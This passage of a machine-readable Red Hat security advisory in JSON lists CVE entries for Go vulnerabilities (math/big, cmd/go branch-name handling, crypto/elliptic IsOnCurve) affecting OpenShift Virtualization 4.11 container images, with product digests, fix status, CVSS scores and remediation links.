"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString" }, { "cve": "CVE-2022-23773", "cwe": { "id": "CWE-1220", "name": "Insufficient Granularity of Access Control" }, "discovery_date": "2022-02-11T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2053541" } ], "notes": [ { "category": "description", "text": "A flaw was found in the go package of the cmd library in golang. The go command could be tricked into accepting a branch, which resembles a version tag. This issue could allow a remote unauthenticated attacker to bypass security restrictions and introduce invalid or incorrect tags, reducing the integrity of the environment.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: cmd/go: misinterpretation of branch names can lead to incorrect access control", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64" ], "known_not_affected": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-23773" }, { "category": "external", "summary": "RHBZ#2053541", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053541" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-23773", "url": "https://www.cve.org/CVERecord?id=CVE-2022-23773" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-23773", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23773" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", "url": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ" } ], "release_date": "2022-02-11T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-14T19:28:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6526" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "products": [ "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: cmd/go: misinterpretation of branch names can lead to incorrect access control" }, { "cve": "CVE-2022-23806", "cwe": { "id": "CWE-252", "name": "Unchecked Return Value" }, "discovery_date": "2022-02-11T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2053429" } ], "notes": [ { "category": "description", "text": "A flaw was found in the elliptic package of the crypto library in golang when the IsOnCurve function could return true for invalid field elements. This flaw allows an attacker to take advantage of this undefined behavior, affecting the availability and integrity of the resource.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: crypto/elliptic: IsOnCurve returns true for invalid field elements", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Enterprise Linux 8 and 9 are affected because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having a Moderate security impact. The issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7; hence, marked as Out-of-Support-Scope. \n\nRed Hat Developer Tools - Compilers (go-toolset-1.16 \u0026 1.17), will not be addressed in future updates as shipped only in RHEL-7, hence, marked as Out-of-Support-Scope.\n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle \u0026 Updates Policy: https://access.redhat.com/support/policy/updates/errata/.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64" ], "known_not_affected": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", 